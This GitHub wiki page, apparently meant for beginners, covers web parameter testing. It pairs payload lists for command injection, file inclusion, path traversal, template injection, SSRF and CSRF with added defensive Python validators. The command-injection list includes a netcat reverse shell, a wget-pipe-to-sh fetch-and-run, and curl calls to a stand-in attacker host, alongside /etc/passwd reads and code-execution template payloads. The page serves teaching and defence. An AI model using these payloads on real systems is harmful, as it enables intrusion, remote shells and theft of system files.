Parameter Testing and Vulnerability Scanning - pentestfunctions/Hacking-For-Beginners GitHub Wiki
This document focuses on various techniques for parameter testing and vulnerability scanning in web applications, using example.com for practical examples.
- Enumeration
- Testing Techniques
- Specific Vulnerabilities and Examples
## Enumeration

**Discovering Parameters:** Use browser developer tools and automated crawlers to identify the input parameters a web application accepts.
## Testing Techniques

### Command Injection

**Example:** Test whether example.com allows executing system commands via parameters, e.g. by appending `; ls` to a URL parameter.

Payloads:

```text
; uname -a
| whoami
& id
; ping -c 1 192.168.1.1
; netstat -an
; curl http://attacker.com
$(<command>)
; python -c 'import socket,subprocess,os'
; nc -e /bin/sh attacker_ip 1234
; wget http://attacker.com/malicious_script -O- | sh
```
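Every payload in that list works for the same reason: the parameter is pasted into a string that a shell parses, so `;`, `|`, `&` and `$(...)` become operators. The following example, added here and not part of the wiki page, shows the vulnerable pattern next to the hardened one (validate the value as a hostname or IP, then pass it as a single argv element with no shell involved) and a small log-review helper that flags values carrying shell operators. The `ping` use case, the regex and the metacharacter set are the example's own assumptions.

```python
import ipaddress
import re
import subprocess

# Hostnames per RFC 1123: labels of letters, digits and hyphens, joined by dots.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

# Characters a POSIX shell treats as operators; any of them inside a "host" value is a probe, not a host.
SHELL_METACHARACTERS = frozenset(";|&$`<>(){}\n\r")


def vulnerable_ping_command(host: str) -> str:
    """The pattern the payloads above target: the parameter is interpolated into a shell line.

    Running this string with subprocess.run(..., shell=True) lets a value such as
    'example.com; uname -a' execute the second command."""
    return f"ping -c 1 {host}"


def is_valid_host(host: str) -> bool:
    """Accept a hostname or an IP literal; reject everything else."""
    if HOSTNAME_RE.match(host):
        return True
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def ping_argv(host: str) -> list[str]:
    """Hardened form: validate first, then build an argv list so no shell ever parses the value."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host parameter: {host!r}")
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> int:
    """Execute with shell=False; the host is exactly one argument, whatever it contains."""
    completed = subprocess.run(ping_argv(host), capture_output=True, timeout=5, check=False)
    return completed.returncode


def flag_injection_probe(value: str) -> bool:
    """Detection aid for log review: True when a parameter value carries shell operators."""
    return any(ch in SHELL_METACHARACTERS for ch in value)


if __name__ == "__main__":
    # Constructed sample values: one legitimate host, one IP, two probes.
    for sample in ["example.com", "127.0.0.1", "example.com; uname -a", "$(id)"]:
        print(f"{sample!r}: valid={is_valid_host(sample)} probe={flag_injection_probe(sample)}")
```

Because the validator accepts only characters that cannot start an option or act as a shell operator, `ping_argv` never needs to quote or escape anything; rejecting the value outright is simpler and easier to audit than trying to sanitise it.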
### Local File Inclusion (LFI)

**Example:** Check whether example.com allows including files via parameters, e.g. `?file=../../../etc/passwd`.

Payloads:

```text
../../../../etc/passwd
../../../../var/log/apache2/access.log
?file=php://filter/convert.base64-encode/resource=index.php
?file=/proc/self/environ
../../../../../boot.ini
..%2f..%2f..%2fetc%2fpasswd
?file=http://attacker.com/malicious_file
?file=data://text/plain;base64,<base64_encoded_payload>
../../../../../var/mysql/my.cnf
?file=ftp://attacker.com/malicious_file
```
### Path Traversal

**Example:** Attempt to access files outside the intended directory, e.g. `?path=../admin/`.

Payloads:

```text
../etc/passwd
../../admin.php
../../../config/db.php
..%2F..%2F..%2Fetc%2Fpasswd
....///boot.ini
..%5C..%5CWindows%5Csystem.ini
..%c0%af..%c0%afetc%c0%afpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
....//....//etc/passwd
..\\..\\boot.ini
```
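The LFI and path-traversal payload lists above are variations on one question: does the application decode, normalise and confine the parameter before touching the filesystem? The resolver below is an added example (not code from the wiki page) serving both sections. It decodes percent-encoding until stable (so `%252e%252e` is seen as `..`), rejects overlong UTF-8 such as `%c0%af` by decoding strictly, refuses any URL scheme (`php://`, `data://`, `http://`, `ftp://`), treats backslashes as separators, normalises with `posixpath` and finally checks that the result still lies under the document root. `DOC_ROOT` and the sample parameter values are the example's own constructions.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Constructed document root for the example; a real application would use its own.
DOC_ROOT = "/var/www/app/public"


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so double encoding is unwrapped.

    errors='strict' makes overlong UTF-8 such as %c0%af raise UnicodeDecodeError
    (a ValueError subclass) instead of silently becoming a replacement character."""
    for _ in range(max_rounds):
        decoded = unquote(value, errors="strict")
        if decoded == value:
            return decoded
        value = decoded
    raise ValueError("too many encoding layers")


def resolve_param_path(user_value: str, root: str = DOC_ROOT) -> str:
    """Map a ?file=/?path= parameter onto a file inside root, or raise ValueError."""
    decoded = fully_decode(user_value)
    if "\x00" in decoded:
        raise ValueError("null byte in path")
    # Stream wrappers and remote includes (php://, data://, http://, ftp://, file://) are never local files.
    if urlsplit(decoded).scheme or "://" in decoded:
        raise ValueError("URL scheme not allowed")
    # Treat backslashes as separators so ..\..\ is not smuggled past a POSIX normalise.
    decoded = decoded.replace("\\", "/")
    if decoded.startswith("/"):
        raise ValueError("absolute path not allowed")
    # Collapse ./, // and a/../b. A segment like '....' is just an odd directory name here,
    # because this code never strips '../' (the filter the '....//' payload is designed to beat).
    normalized = posixpath.normpath(decoded)
    if normalized == ".." or normalized.startswith("../"):
        raise ValueError("directory traversal")
    candidate = posixpath.normpath(posixpath.join(root, normalized))
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError("resolved path escapes document root")
    return candidate


def is_allowed(user_value: str, root: str = DOC_ROOT) -> bool:
    """Boolean wrapper for log review or tests."""
    try:
        resolve_param_path(user_value, root)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed samples: one legitimate value followed by payloads from the lists above.
    for sample in ["docs/readme.txt", "../../../../etc/passwd", "..%2f..%2f..%2fetc%2fpasswd",
                   "php://filter/convert.base64-encode/resource=index.php", "....//....//etc/passwd"]:
        print(f"{sample!r}: allowed={is_allowed(sample)}")
```

Note that the check is on the normalised string, so symlinks inside the document root are not followed; where the root may contain links, run `os.path.realpath` on the result and repeat the prefix check before opening the file.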
### Server-Side Template Injection (SSTI)

**Example:** Identify whether example.com's template engine can be exploited, e.g. by using `{{7*7}}` in a parameter.

Payloads:

```text
{{7*'7'}}
{{config.items()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('ls').read()}}
${7*7}
#{7*7}
[%'7'*'7'%]
{{__import__('os').popen('cat /etc/passwd').read()}}
{{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['system']('id')}}
```
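The arithmetic probes (`{{7*7}}`, `${7*7}`, `#{7*7}`, `{{7*'7'}}`) are only useful if you can read their result correctly: the probe echoed back verbatim means the value was treated as data, `49` means an expression was evaluated, and `{{7*'7'}}` separates engines that repeat strings (Python-style, e.g. Jinja2 gives `7777777`) from those that coerce `'7'` to a number (e.g. Twig gives `49`). The classifier below is an added example, not part of the wiki page; the response bodies are constructed stand-ins for real HTTP responses. The underlying fix is the same regardless of engine: render user input as a template variable (`template.render(name=value)`), never as template source (`Template(value)`).

```python
import re

# Constructed response bodies standing in for what a probe request would return.
CONSTRUCTED_RESPONSES = {
    "reflected": "<p>Hello {{7*'7'}}</p>",      # value treated as data: safe
    "jinja2_like": "<p>Hello 7777777</p>",      # string repetition: Python-style engine
    "twig_like": "<p>Hello 49</p>",             # numeric coercion of '7'
    "error": "TemplateSyntaxError: unexpected char",
}

ARITHMETIC_PROBES = {"{{7*7}}", "${7*7}", "#{7*7}"}
STRING_REPEAT_PROBE = "{{7*'7'}}"


def classify_probe_response(probe: str, body: str) -> str:
    """Explain what a response to one of the arithmetic probes above indicates."""
    if probe in body:
        return "not evaluated: probe reflected verbatim"
    if probe == STRING_REPEAT_PROBE and "7777777" in body:
        return "evaluated: string repetition, Python-style engine (e.g. Jinja2)"
    if re.search(r"\b49\b", body):
        if probe == STRING_REPEAT_PROBE:
            return "evaluated: numeric coercion of '7' (e.g. Twig)"
        return "evaluated: arithmetic, engine not yet identified"
    if re.search(r"TemplateSyntaxError|SyntaxError", body):
        return "parsed as template: syntax error leaked"
    return "inconclusive: probe absent and no evaluation artefact"


def triage_all(probe: str, responses: dict) -> dict:
    """Run the classifier over several captured bodies at once (handy for a scanner report)."""
    return {name: classify_probe_response(probe, body) for name, body in responses.items()}


if __name__ == "__main__":
    for name, verdict in triage_all(STRING_REPEAT_PROBE, CONSTRUCTED_RESPONSES).items():
        print(f"{name}: {verdict}")
```

The `\b49\b` boundary check avoids a false positive when the number merely appears inside another value (a product ID such as `149`), which is a common source of noise in automated scans.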
### Server-Side Request Forgery (SSRF)

**Example:** Test whether internal requests can be made via parameters, e.g. `?url=http://localhost/admin`.

Payloads:

```text
?url=file:///etc/passwd
?url=http://127.0.0.1/
?url=http://169.254.169.254/latest/meta-data/
?url=gopher://attacker.com:80/_SSRF_
?url=dns://localhost
?url=dict://localhost:11211
?dest=ftp://user:pass@localhost/
?uri=ldap://localhost
?path=http://[0:0:0:0:0:ffff:127.0.0.1]/
?url=file://C:/Windows/win.ini
```
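The payloads above probe three weaknesses at once: unexpected schemes (`file:`, `gopher:`, `dict:`, `ftp:`, `ldap:`, `dns:`), internal destinations (loopback, RFC 1918, the `169.254.169.254` cloud metadata address) and encoding tricks such as the IPv4-mapped IPv6 literal `[::ffff:127.0.0.1]`. The validator below is an added example, not code from the wiki page: it restricts the scheme, refuses embedded credentials, unwraps IPv4-mapped addresses before classifying IP literals and otherwise requires an allow-listed hostname. `ALLOWED_HOSTS` and the sample URLs are the example's own constructions.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Constructed allow list: the only hosts this service is meant to fetch from.
ALLOWED_HOSTS = {"api.example.com", "cdn.example.com"}


def is_internal_address(ip) -> bool:
    """Loopback, RFC 1918, link-local (incl. 169.254.169.254), multicast, reserved, 0.0.0.0/::."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_outbound_url(url: str) -> tuple[bool, str]:
    """Return (allowed, reason) for a user-supplied ?url= value."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        # Covers file:, gopher:, dict:, ftp:, dns:, ldap: and a missing scheme.
        return False, f"scheme {scheme or '(none)'!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None:
        # [::ffff:127.0.0.1] is IPv4 loopback in an IPv6 wrapper; unwrap before classifying.
        if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped
        if is_internal_address(ip):
            return False, f"internal address {ip}"
        return False, "IP literals not allowed; use an allow-listed hostname"
    if host.lower() not in ALLOWED_HOSTS:
        return False, f"host {host!r} not on allow list"
    return True, "ok"


if __name__ == "__main__":
    # Constructed samples: one legitimate URL followed by payloads from the list above.
    for sample in ["https://api.example.com/v1/items", "http://127.0.0.1/",
                   "http://169.254.169.254/latest/meta-data/", "http://[0:0:0:0:0:ffff:127.0.0.1]/",
                   "file:///etc/passwd", "gopher://attacker.com:80/_SSRF_", "http://localhost/admin"]:
        print(f"{sample}: {validate_outbound_url(sample)}")
```

String validation alone does not close the DNS side of the problem: an allow-listed hostname can still resolve to an internal address at request time (DNS rebinding), and a permitted server can redirect to one. Resolve the name and re-run `is_internal_address` on the address actually connected to, and either disable redirects or validate each hop with the same function.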
### Cross-Site Request Forgery (CSRF)

**Example:** Check whether unauthorized actions can be performed on behalf of an authenticated user of example.com.

Payloads:

```html
<img src="http://example.com/endpoint?param=value" />
<form action="http://example.com/endpoint" method="POST"><input type="submit" /></form>
<iframe src="http://example.com/action"></iframe>
<script>fetch('http://example.com/endpoint', { method: 'POST', body: JSON.stringify({data: 'value'}) })</script>
<object data="http://example.com/endpoint"></object>
<link rel="import" href="http://example.com/endpoint">
<a href="http://example.com/endpoint" rel="noreferrer">Click me</a>
<svg onload="fetch('http://example.com/endpoint', {method: 'POST'})"></svg>
```

- Using `XMLHttpRequest` to send POST requests.
- Using the Fetch API to send requests.
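The payloads above fall into two groups: GET-based vectors (`<img>`, `<iframe>`, `<object>`, `<link>`, `<a>`) that only work if a GET request changes state, and POST-based vectors (`<form>`, `fetch`, `XMLHttpRequest`) that work when the server accepts a state change with nothing more than the session cookie. The server-side check below is an added example, not code from the wiki page, and shows the three controls that defeat both groups: refuse state changes over safe methods, compare the `Origin` (or `Referer`) header against the site origin, and require a per-session synchroniser token verified with a constant-time comparison. The secret, origin and header names are the example's own assumptions.

```python
import hashlib
import hmac
import secrets

# Constructed values for the example; a real deployment loads the secret from configuration.
SERVER_SECRET = b"constructed-example-secret-rotate-in-production"
SITE_ORIGIN = "https://example.com"
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def issue_csrf_token(session_id: str) -> str:
    """Token = nonce.HMAC(secret, session_id:nonce): unguessable and bound to one session."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def is_state_change_allowed(method: str, headers: dict, form: dict, session_id: str) -> tuple[bool, str]:
    """Decide whether a request may change state; returns (allowed, reason)."""
    h = {k.lower(): v for k, v in headers.items()}  # HTTP header names are case-insensitive
    if method.upper() in SAFE_METHODS:
        # <img src=...> and <iframe src=...> can only issue GETs, so GET must never change state.
        return False, "state changes are not accepted over safe methods"
    origin = h.get("origin") or h.get("referer")
    if origin is None:
        return False, "no Origin/Referer header"
    if not (origin == SITE_ORIGIN or origin.startswith(SITE_ORIGIN + "/")):
        return False, f"cross-site origin {origin}"
    token = form.get("csrf_token") or h.get("x-csrf-token")
    if not token or not verify_csrf_token(session_id, token):
        return False, "missing or invalid CSRF token"
    return True, "ok"


if __name__ == "__main__":
    sid = "constructed-session-id"
    token = issue_csrf_token(sid)
    print(is_state_change_allowed("POST", {"Origin": SITE_ORIGIN}, {"csrf_token": token}, sid))
    print(is_state_change_allowed("POST", {"Origin": "https://attacker.example"}, {"csrf_token": token}, sid))
    print(is_state_change_allowed("GET", {"Origin": SITE_ORIGIN}, {"csrf_token": token}, sid))
```

The `startswith(SITE_ORIGIN + "/")` form matters: a bare prefix check would accept `https://example.com.attacker.example`. Setting the session cookie with `SameSite=Lax` or `Strict` adds a browser-side layer, but the token check above is what protects clients and proxies that do not honour it.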
## Specific Vulnerabilities and Examples

- SQL Injection: Save a Burp Suite request and test it with sqlmap: `sqlmap -r request.txt --batch`.
- Cross-Site Scripting (XSS): Check for parameters that don't sanitize input, e.g. `<script>alert('XSS')</script>`.
- Buffer Overflow: Test if long inputs in parameters cause crashes or unexpected behavior.
- LDAP Injection: Inject LDAP query syntax into input parameters to see if it is processed.
- CORS Misconfiguration: Test if example.com leaks data to unauthorized domains.
- 2FA Bypass: Explore methods like intercepting tokens or logic flaws to bypass 2FA on example.com.
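The SQL, XSS, LDAP and oversized-input items in that list share one root cause, a parameter value reaching an interpreter as syntax rather than as data, and one family of fixes. The block below is an added example, not code from the wiki page: a parameterised SQL query (the driver binds the value, so sqlmap's probes stay literal strings), HTML encoding before reflecting a value into a page (which neutralises the `<script>alert('XSS')</script>` check), RFC 4515 escaping for values placed in an LDAP search filter, and a hard length limit that rejects rather than truncates oversized input. The in-memory SQLite table, the limit and the filter shape are the example's own constructions.

```python
import html
import sqlite3

MAX_PARAM_LENGTH = 256  # constructed limit; oversized values are rejected, not truncated

# RFC 4515: characters with special meaning inside an LDAP filter value.
LDAP_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def check_length(value: str) -> str:
    """First line of defence for every parameter: bound the size before parsing anything."""
    if len(value) > MAX_PARAM_LENGTH:
        raise ValueError("parameter too long")
    return value


def escape_ldap_filter_value(value: str) -> str:
    """Escape a value so it cannot close or extend the surrounding LDAP filter."""
    return "".join(LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_user_filter(username: str) -> str:
    """A username of '*)(uid=*)' stays a literal string instead of rewriting the filter."""
    return f"(&(objectClass=person)(uid={escape_ldap_filter_value(check_length(username))}))"


def render_comment(text: str) -> str:
    """HTML-encode before reflecting into a page; quote=True also covers attribute contexts."""
    return f"<p>{html.escape(check_length(text), quote=True)}</p>"


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory table for the example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users (username) VALUES (?)", [("alice",), ("bob",)])
    return conn


def find_user(conn: sqlite3.Connection, username: str) -> list[tuple]:
    """Parameterised query: the driver binds username as data, never as SQL text."""
    cur = conn.execute("SELECT id, username FROM users WHERE username = ?", (check_length(username),))
    return cur.fetchall()


if __name__ == "__main__":
    conn = demo_db()
    print(find_user(conn, "alice"))
    print(find_user(conn, "' OR '1'='1"))          # constructed injection probe: matches nothing
    print(render_comment("<script>alert('XSS')</script>"))
    print(build_user_filter("*)(uid=*)"))
```

Encoding is context-specific: `html.escape` is right for element content and quoted attributes, but a value placed inside a JavaScript string, a URL or a CSS block needs the encoder for that context, and the LDAP escape table above applies only to filter values, not to distinguished names.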
Note: Always ensure that your testing is ethical, legal, and authorized. Unauthorized testing can result in serious legal consequences.